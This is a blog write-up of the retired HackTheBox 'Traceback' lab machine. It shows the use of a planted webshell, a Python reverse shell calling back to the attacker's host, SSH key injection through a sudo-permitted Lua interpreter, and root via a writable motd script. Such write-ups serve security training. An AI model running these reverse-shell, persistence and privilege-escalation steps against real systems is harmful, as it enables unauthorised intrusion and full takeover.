<!DOCTYPE html>
<html lang=en>
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Traceback just retired on Hackthebox, it’s an easy difficulty Linux box. This one is quite straightforward box if you are familiar with CTF. It exploit a similar misconfiguration we saw previously i">
<meta property="og:type" content="article">
<meta property="og:title" content="HackTheBox - Traceback">
<meta property="og:url" content="https://hg8.sh/posts/traceback/index.html">
<meta property="og:site_name" content="hg8&#39;s Notes — My notes about infosec world. Pentest&#x2F;Bug Bounty&#x2F;CTF Writeups.">
<meta property="og:description" content="Traceback just retired on Hackthebox, it’s an easy difficulty Linux box. This one is quite straightforward box if you are familiar with CTF. It exploit a similar misconfiguration we saw previously i">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/82158679-9b336680-9889-11ea-8696-6a9b2dfe32ca.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/77252647-75a52a80-6c55-11ea-8d0d-ec4daaa5f7bf.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/77252895-3081f800-6c57-11ea-8f0f-67a74318d795.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/77252915-5b6c4c00-6c57-11ea-8237-4d8ff8580f26.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/77253164-e732a800-6c58-11ea-9659-e48e79783f6b.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/77253323-a12a1400-6c59-11ea-8ac4-f929aca19150.png">
<meta property="article:published_time" content="2020-08-14T22:00:00.000Z">
<meta property="article:modified_time" content="2022-08-04T08:37:52.838Z">
<meta property="article:author" content="hg8">
<meta property="article:tag" content="linux">
<meta property="article:tag" content="webshell">
<meta property="article:tag" content="sudo">
<meta property="article:tag" content="traceback">
<meta property="article:tag" content="lua">
<meta property="article:tag" content="motd">
<meta property="article:tag" content="run-parts">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://user-images.githubusercontent.com/9076747/82158679-9b336680-9889-11ea-8696-6a9b2dfe32ca.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
     
    <title>HackTheBox - Traceback :: hg8&#39;s Notes — My notes about infosec world. Pentest/Bug Bounty/CTF Writeups.</title>
    
<link rel="stylesheet" href="/css/style.css">

    
    
<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="hg8's Notes — My notes about infosec world. Pentest/Bug Bounty/CTF Writeups." type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/posts/magic/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/posts/oouch/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
    </span>
    <br/>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#User-flag"><span class="toc-number">1.</span> <span class="toc-text">User flag</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Recon"><span class="toc-number">1.1.</span> <span class="toc-text">Recon</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Smevk-Webshell"><span class="toc-number">1.2.</span> <span class="toc-text">Smevk Webshell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Pivot-webadmin-gt-sysadmin"><span class="toc-number">1.3.</span> <span class="toc-text">Pivot webadmin -&gt; sysadmin</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Root-Flag"><span class="toc-number">2.</span> <span class="toc-text">Root Flag</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Recon-1"><span class="toc-number">2.1.</span> <span class="toc-text">Recon</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Exploiting-run-parts-and-motd"><span class="toc-number">2.2.</span> <span class="toc-text">Exploiting run-parts and motd</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        <header id="header">
  <a href="/">
  
      <div id="logo" style="background-image: url(/images/logo.webp);"></div>
  
    <span class="logo__mark"></span>
    <span class="logo__text">./hg8.sh</span>
    <span class="logo__cursor"></span>
  </a>
  <div id="nav">
    <ul>
      <li class="icon">
        <a href="#"><i class="fas fa-bars fa-2x"></i></a>
      </li>
       
        <li><a href="/">Home</a></li>
       
        <li><a href="/about/">About</a></li>
       
        <li><a href="/archives/">Posts</a></li>
       
        <li><a href="/search/">Search</a></li>
      
    </ul>
  </div>
</header>

        
          <br>
          <br>
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        HackTheBox - Traceback
    </h1>



    <div class="meta"> 
      
    <div class="postdate">
      
        <time datetime="2020-08-14T22:00:00.000Z" itemprop="datePublished">15-08-2020</time>
        
      
    </div>


      — Written by 
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">hg8</span>
      </span>
      —
      8 min read
    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <img width="582" alt="traceback-hackthebox" src="https://user-images.githubusercontent.com/9076747/82158679-9b336680-9889-11ea-8696-6a9b2dfe32ca.png">

<p>Traceback just retired on Hackthebox, it’s an easy difficulty Linux box. This one is quite straightforward box if you are familiar with CTF. It exploit a similar misconfiguration we saw previously in the <a href="https://hg8.sh/posts/writeup/">Writeup Box</a>. I wouldn’t recommend it for total beginner since the frequent reset resulting in lot of users working on it, and exploit conflicts can be frustrating to progress on. </p>
<p><strong>Tl;Dr:</strong> The user flag consist in retrieving and exploiting a web-shell planted by a hacker on the web-server of the machine. From there you pivot from <code>webadmin</code> to <code>sysadmin</code> using a Lua interpreter running as the said user.<br>The root flag could be grabbed by exploiting a misconfiguration of <code>/etc/update-motd.d/</code> folder permissions allowing the user to edit scripts run as <code>root</code> by <code>run-parts</code> at login time.</p>
<p>Alright! Let’s get into the details now!</p>
<hr>
<p>First thing first, let’s add the box IP to the host file:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ <span class="built_in">echo</span> <span class="string">&quot;10.10.10.181 traceback.htb&quot;</span> &gt;&gt; /etc/hosts</span><br></pre></td></tr></table></figure>

<p>and let’s start!</p>
<h2 id="User-flag"><a href="#User-flag" class="headerlink" title="User flag"></a>User flag</h2><h3 id="Recon"><a href="#Recon" class="headerlink" title="Recon"></a>Recon</h3><p>Let’s start with the classic <code>nmap</code> scan to see which ports are open on the box:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ nmap -sV -sT -sC traceback.htb</span><br><span class="line">Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-21 21:11 CET</span><br><span class="line">Nmap scan report <span class="keyword">for</span> traceback.htb (10.10.10.181)</span><br><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line">22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)</span><br><span class="line">80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))</span><br><span class="line">|_http-server-header: Apache/2.4.29 (Ubuntu)</span><br><span class="line">|_http-title: Help us</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br></pre></td></tr></table></figure>

<p>We have the “classic”: A web app running on port 80 and the SSH port 22 open. </p>
<p>Opening <code>http://traceback.htb/</code> display the following website:</p>
<p><img src="https://user-images.githubusercontent.com/9076747/77252647-75a52a80-6c55-11ea-8d0d-ec4daaa5f7bf.png" alt="traceback owned"></p>
<p>From what we can see here the website seems to have been hacked. The malicious actor indicate he/she left a backdoor open. </p>
<p>That’s a nice hint… If we can find this backdoor we can use it without needing to find the exploit by ourselves.<br>With that in mind let’s try to find more informations.</p>
<p>When we check the code source of the page we notice an interesting comment:</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">center</span>&gt;</span></span><br><span class="line">                <span class="tag">&lt;<span class="name">h1</span>&gt;</span>This site has been owned<span class="tag">&lt;/<span class="name">h1</span>&gt;</span></span><br><span class="line">                <span class="tag">&lt;<span class="name">h2</span>&gt;</span>I have left a backdoor for all the net. FREE INTERNETZZZ<span class="tag">&lt;/<span class="name">h2</span>&gt;</span></span><br><span class="line">                <span class="tag">&lt;<span class="name">h3</span>&gt;</span> - Xh4H - <span class="tag">&lt;/<span class="name">h3</span>&gt;</span></span><br><span class="line">                <span class="comment">&lt;!--Some of the best web shells that you might need ;)--&gt;</span></span><br><span class="line">        <span class="tag">&lt;/<span class="name">center</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>Googling <code>Some of the best web shells that you might need</code> return a <a target="_blank" rel="noopener" href="https://github.com/TheBinitGhimire/Web-Shells">Github repository</a> with the exact same text as description full of webshell. Our hacker used one of those for sure.</p>
<p>From here we could write a little script that get the shells list on the git repository and to test each shell in the url to find which one if is present on the server but…. since there is only 15 let’s just copy paste by hand ;)</p>
<p>We got on the right idea, opening <code>http://traceback.htb/smevk.php</code> display this login page:</p>
<p><img src="https://user-images.githubusercontent.com/9076747/77252895-3081f800-6c57-11ea-8f0f-67a74318d795.png" alt="smevk shell login page"></p>
<h3 id="Smevk-Webshell"><a href="#Smevk-Webshell" class="headerlink" title="Smevk Webshell"></a>Smevk Webshell</h3><p>Checking the <a target="_blank" rel="noopener" href="https://github.com/TheBinitGhimire/Web-Shells/blob/master/smevk.php">shell source code</a> on the previous Github repository informs us that the defaults credentials are <code>admin:admin</code>. Let’s try:</p>
<p><img src="https://user-images.githubusercontent.com/9076747/77252915-5b6c4c00-6c57-11ea-8237-4d8ff8580f26.png" alt="smevk shell"></p>
<p>Let’s try not to focus too much on the design here. </p>
<p>The shell allow include a command injection tool, but it’s far from being practical. The easiest way to progress from here is to open a reverse shell using the web shell. We can use for example a Python one:</p>
<ol>
<li>Creating and dropping the Python reverse shell:</li>
</ol>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ cat hg8.py</span><br><span class="line">import socket,subprocess,os;</span><br><span class="line">s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);</span><br><span class="line">s.connect((<span class="string">&quot;10.10.10.10&quot;</span>,8585));</span><br><span class="line">os.dup2(s.fileno(),0);</span><br><span class="line">os.dup2(s.fileno(),1);</span><br><span class="line">os.dup2(s.fileno(),2);</span><br><span class="line">p=subprocess.call([<span class="string">&quot;/bin/sh&quot;</span>,<span class="string">&quot;-i&quot;</span>]);</span><br></pre></td></tr></table></figure>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ python -m http.server</span><br><span class="line">Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...</span><br></pre></td></tr></table></figure>

<p>Once we have created our reverse shell we can use the Web Shell to upload it to the server:</p>
<p><img src="https://user-images.githubusercontent.com/9076747/77253164-e732a800-6c58-11ea-9659-e48e79783f6b.png" alt="sending python reverse shell"></p>
<ol start="2">
<li>We then start our listener:</li>
</ol>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ nc -l -vv -p 8585</span><br><span class="line">Listening on any address 8585</span><br></pre></td></tr></table></figure>

<ol start="3">
<li>And finally launch our reverse shell using the Web Shell:</li>
</ol>
<p><img src="https://user-images.githubusercontent.com/9076747/77253323-a12a1400-6c59-11ea-8ac4-f929aca19150.png" alt="python reverse shell"></p>
<p>And we get our connection:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ nc -l -vv -p 8585</span><br><span class="line">Listening on any address 8585</span><br><span class="line">Connection from 10.10.10.181:58642</span><br><span class="line">/bin/sh: 0: can<span class="string">&#x27;t access tty; job control turned off</span></span><br><span class="line"><span class="string">$ id</span></span><br><span class="line"><span class="string">uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)</span></span><br></pre></td></tr></table></figure>

<p>We now have a shell as <code>webadmin</code> user. Let’s now do a bit of recon on this user files available on the box:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">webadmin@traceback:/$ ls -l /home/</span><br><span class="line">total 8</span><br><span class="line">drwxr-x--- 5 sysadmin sysadmin 4096 Mar 22 07:26 sysadmin</span><br><span class="line">drwxr-x--- 5 webadmin sysadmin 4096 Mar 16 04:03 webadmin</span><br><span class="line"></span><br><span class="line">webadmin@traceback:/$ ls /home/webadmin</span><br><span class="line">note.txt</span><br><span class="line"></span><br><span class="line">webadmin@traceback:/$ cat note.txt</span><br><span class="line">- sysadmin -</span><br><span class="line">I have left a tool to practice Lua.</span><br><span class="line">I<span class="string">&#x27;m sure you know where to find it.</span></span><br><span class="line"><span class="string">Contact me if you have any question.</span></span><br></pre></td></tr></table></figure>

<p>Alright we have a little more information here. We will need to pivot to <code>sysadmin</code> user and this one gave left a note leading  to a tool about practice Lua. </p>
<h3 id="Pivot-webadmin-gt-sysadmin"><a href="#Pivot-webadmin-gt-sysadmin" class="headerlink" title="Pivot webadmin -&gt; sysadmin"></a>Pivot webadmin -&gt; sysadmin</h3><p>Since we don’t know where is the tool to practice Lua that <code>sysadmin</code> talk about let’s continue our classic recon process for the moment. </p>
<p>When checking for informations on <code>sudo</code> we stumble upon an interesting <code>NOPASSWD</code> entry: </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">webadmin@traceback:/$ sudo -l</span><br><span class="line">Matching Defaults entries <span class="keyword">for</span> webadmin on traceback:</span><br><span class="line">    env_reset, mail_badpass, secure_path=/usr/<span class="built_in">local</span>/sbin\:/usr/<span class="built_in">local</span>/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin</span><br><span class="line"></span><br><span class="line">User webadmin may run the following commands on traceback:</span><br><span class="line">    (sysadmin) NOPASSWD: /home/sysadmin/luvit</span><br></pre></td></tr></table></figure>

<p>We can run the following command <code>/home/sysadmin/luvit</code> as <code>sysadmin</code> without having to use password. </p>
<p>Let’s open this <code>luveit</code> to see what is it about:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">webadmin@traceback:/$ sudo -u sysadmin /home/sysadmin/luvit</span><br><span class="line">Welcome to the Luvit repl!</span><br><span class="line">&gt;</span><br></pre></td></tr></table></figure>

<p>According to Luvit.io website:</p>
<blockquote>
<p>Luvit implements the same APIs as Node.js, but in Lua!<br>This helps teams migrate without having to learn a new way of programming.  </p>
</blockquote>
<p>So if I understand correctly it’s a Lua interpreter including the same APIs as Node.js.</p>
<p>Since it’s able to run Lua and Node.js as <code>sysadmin</code> it very possible we have write abilities on <code>sysadmin</code> home folder. And we know that arbitrary file write definitely lead to privilege escalation.</p>
<p>A common approach to privilege escalation using file write is to add our public SSH key to the <code>~/.ssh/authorized_keys</code> file.</p>
<p>In Lua this would give something like this:</p>
<figure class="highlight lua"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">file = <span class="built_in">io</span>.<span class="built_in">open</span>(<span class="string">&quot;/home/sysadmin/.ssh/authorized_keys&quot;</span>, <span class="string">&quot;a&quot;</span>)</span><br><span class="line">file:<span class="built_in">write</span>(<span class="string">&quot;ssh-rsa AAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXLmWQ== hg8@hg8.sh&quot;</span>)</span><br><span class="line">file:<span class="built_in">close</span>()</span><br></pre></td></tr></table></figure>

<p><em>Note: Don’t forget to open the <code>authorized_keys</code> file in append mode (<code>a</code>) to not overwrite the actual config or the keys of other players that potentially used the same trick.</em></p>
<p>Let’s run it to check if it works as intended:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">webadmin@traceback:/$ sudo -u sysadmin /home/sysadmin/luvit /tmp/hg8.lua</span><br><span class="line">webadmin@traceback:/$ </span><br></pre></td></tr></table></figure>

<p>No error, let’s now try to login to <code>sysadmin</code> account using the SSH key we just authorized:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ ssh -i id_rsa sysadmin@traceback.htb</span><br><span class="line"><span class="comment">#################################</span></span><br><span class="line">-------- OWNED BY XH4H  ---------</span><br><span class="line">- I guess stuff could have been configured better ^^ -</span><br><span class="line"><span class="comment">#################################</span></span><br><span class="line"></span><br><span class="line">Welcome to Xh4H land</span><br><span class="line"></span><br><span class="line">Last login: Mon Mar 16 03:50:24 2020 from 10.10.14.2</span><br><span class="line">sysadmin@traceback:~$ id</span><br><span class="line">uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)</span><br><span class="line">sysadmin@traceback:~$ ls</span><br><span class="line">luvit  user.txt</span><br><span class="line">sysadmin@traceback:~$ cat user.txt</span><br><span class="line">3xxxxxxxxxxxxxxxxxxxxxxxb</span><br></pre></td></tr></table></figure>

<h2 id="Root-Flag"><a href="#Root-Flag" class="headerlink" title="Root Flag"></a>Root Flag</h2><h3 id="Recon-1"><a href="#Recon-1" class="headerlink" title="Recon"></a>Recon</h3><p>The first thing we notice when login to <code>sysadmin</code> account is that our hacker didn’t only drop a webshell on the server but also modified a few files. For example this custom message on login time:</p>
<blockquote>
<p>#################################<br>——– OWNED BY XH4H  ———<br>- I guess stuff could have been configured better ^^ -<br>#################################  </p>
<p>Welcome to Xh4H land</p>
</blockquote>
<p>Let’s search on the system for <code>xh4h</code> to see if our hacker dropped some interesting other files:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">sysadmin@traceback:~$ grep -ri <span class="string">&quot;xh4h&quot;</span> / 2&gt;/dev/null</span><br><span class="line">/etc/update-motd.d/00-header:<span class="built_in">echo</span> <span class="string">&quot;\nWelcome to Xh4H land \n&quot;</span></span><br><span class="line">/var/www/html/index.html:               &lt;h3&gt; - Xh4H - &lt;/h3&gt;</span><br><span class="line">/var/backups/.update-motd.d/00-header:<span class="built_in">echo</span> <span class="string">&quot;\nWelcome to Xh4H land \n&quot;</span></span><br></pre></td></tr></table></figure>

<p>Seems like nothing else to see. </p>
<p>Let’s focus on this <code>00-header</code> in <code>update-motd.d</code> folder. For those who are unfamiliar with <code>motd</code> here is a reminder of what it does:</p>
<blockquote>
<p>The  contents  of /etc/motd are displayed by pam_motd(8) after a successful login but just before it executes the login shell.  </p>
<p>The abbreviation “motd”  stands  for  “message  of  the  day”,  and  this  file  has  been  traditionally  used  for  exactly  that (it requires much less disk space than mail to all  users).</p>
</blockquote>
<p>Let’s see what we have on this server <code>update-motd.d</code>:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">sysadmin@traceback:/etc/update-motd.d$ ls -l</span><br><span class="line">total 24</span><br><span class="line">-rwxrwxr-x 1 root sysadmin  981 Mar 22 09:37 00-header</span><br><span class="line">-rwxrwxr-x 1 root sysadmin  982 Mar 22 09:37 10-help-text</span><br><span class="line">-rwxrwxr-x 1 root sysadmin 4264 Mar 22 09:37 50-motd-news</span><br><span class="line">-rwxrwxr-x 1 root sysadmin  604 Mar 22 09:37 80-esm</span><br><span class="line">-rwxrwxr-x 1 root sysadmin  299 Mar 22 09:37 91-release-upgrade</span><br></pre></td></tr></table></figure>

<p>First thing that catch the eye here is that all those file belong to <code>sysadmin</code> group, meaning we, as <code>sysadmin</code> user can read, write and execute them even though we are not the owner. </p>
<p>Alright, now how are those files executed to end up being displayed at login time ?</p>
<p>If you are familiar with Debian you may know about the <code>run-parts</code> utility:</p>
<blockquote>
<p>run-parts - run scripts or programs in a directory</p>
</blockquote>
<p><code>run-parts</code> will run all the scripts in a given directory. It’s very useful in a lot of scenarios. For example it’s used in Debian to dynamically generate a Message Of Day (MOTD) by combining all the output of scripts present in <code>/etc/update-motd.d/</code> folder, like so:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ run-parts /etc/update-motd.d/*</span><br></pre></td></tr></table></figure>

<p>And this is done at login time as <code>root</code>.</p>
<p> See what’s the issue is here ? We are able to edit file that are going to be run as root. </p>
<p>Let’s now use this knowledge to escalate our privileges to root.</p>
<h3 id="Exploiting-run-parts-and-motd"><a href="#Exploiting-run-parts-and-motd" class="headerlink" title="Exploiting run-parts and motd"></a>Exploiting run-parts and motd</h3><p>To exploit this misconfiguration we could have used the same trick as before to add our SSH key to <code>root</code> user <code>.authorized_keys</code> file. But let’s change a bit and open a reverse shell this time.</p>
<p>First, we open our <code>netcat</code> listener:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ nc -l -vv -p 8585</span><br><span class="line">Listening on any address 8585</span><br></pre></td></tr></table></figure>

<p>Then let’s edit, for example, <code>00-header</code> to add a command to open our reverse shell:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sysadmin@traceback:/etc/update-motd.d$ <span class="built_in">echo</span> <span class="string">&quot;python /tmp/.tmp/hg8.py&quot;</span> &gt;&gt; 00-header</span><br></pre></td></tr></table></figure>

<p>Now next time we login, our reverse shell will be executed as root. Let’s give it a try by logout of SSH and login in again:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ ssh -i id_rsa sysadmin@traceback.htb</span><br><span class="line"><span class="comment">#################################</span></span><br><span class="line">-------- OWNED BY XH4H  ---------</span><br><span class="line">- I guess stuff could have been configured better ^^ -</span><br><span class="line"><span class="comment">#################################</span></span><br><span class="line"></span><br><span class="line">Welcome to Xh4H land</span><br></pre></td></tr></table></figure>

<p>At this moment, our connection as root open:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ nc -l -vv -p 8585</span><br><span class="line">Listening on any address 8585</span><br><span class="line">Connection from 10.10.10.181:60494</span><br><span class="line"><span class="comment"># cat /root/root.txt</span></span><br><span class="line">4xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx9</span><br></pre></td></tr></table></figure>

<hr>
<p>As always do not hesitate to contact me for any questions or feedbacks :)</p>
<p>See you next time !</p>
<p>-hg8</p>

  </div>
</article>
<br>
<br>


    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/CTF/">CTF</a> › <a class="category-link" href="/categories/CTF/HackTheBox/">HackTheBox</a> › <a class="category-link" href="/categories/CTF/HackTheBox/Easy-Box/">Easy Box</a>
    </div>



    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/linux/" rel="tag">linux</a>, <a class="tag-link-link" href="/tags/lua/" rel="tag">lua</a>, <a class="tag-link-link" href="/tags/motd/" rel="tag">motd</a>, <a class="tag-link-link" href="/tags/run-parts/" rel="tag">run-parts</a>, <a class="tag-link-link" href="/tags/sudo/" rel="tag">sudo</a>, <a class="tag-link-link" href="/tags/traceback/" rel="tag">traceback</a>, <a class="tag-link-link" href="/tags/webshell/" rel="tag">webshell</a>
    </div>





        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Posts</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#User-flag"><span class="toc-number">1.</span> <span class="toc-text">User flag</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Recon"><span class="toc-number">1.1.</span> <span class="toc-text">Recon</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Smevk-Webshell"><span class="toc-number">1.2.</span> <span class="toc-text">Smevk Webshell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Pivot-webadmin-gt-sysadmin"><span class="toc-number">1.3.</span> <span class="toc-text">Pivot webadmin -&gt; sysadmin</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Root-Flag"><span class="toc-number">2.</span> <span class="toc-text">Root Flag</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Recon-1"><span class="toc-number">2.1.</span> <span class="toc-text">Recon</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Exploiting-run-parts-and-motd"><span class="toc-number">2.2.</span> <span class="toc-text">Exploiting run-parts and motd</span></a></li></ol></li></ol>
    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2025
    <a href="https://hg8.sh">hg8.sh</a>
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
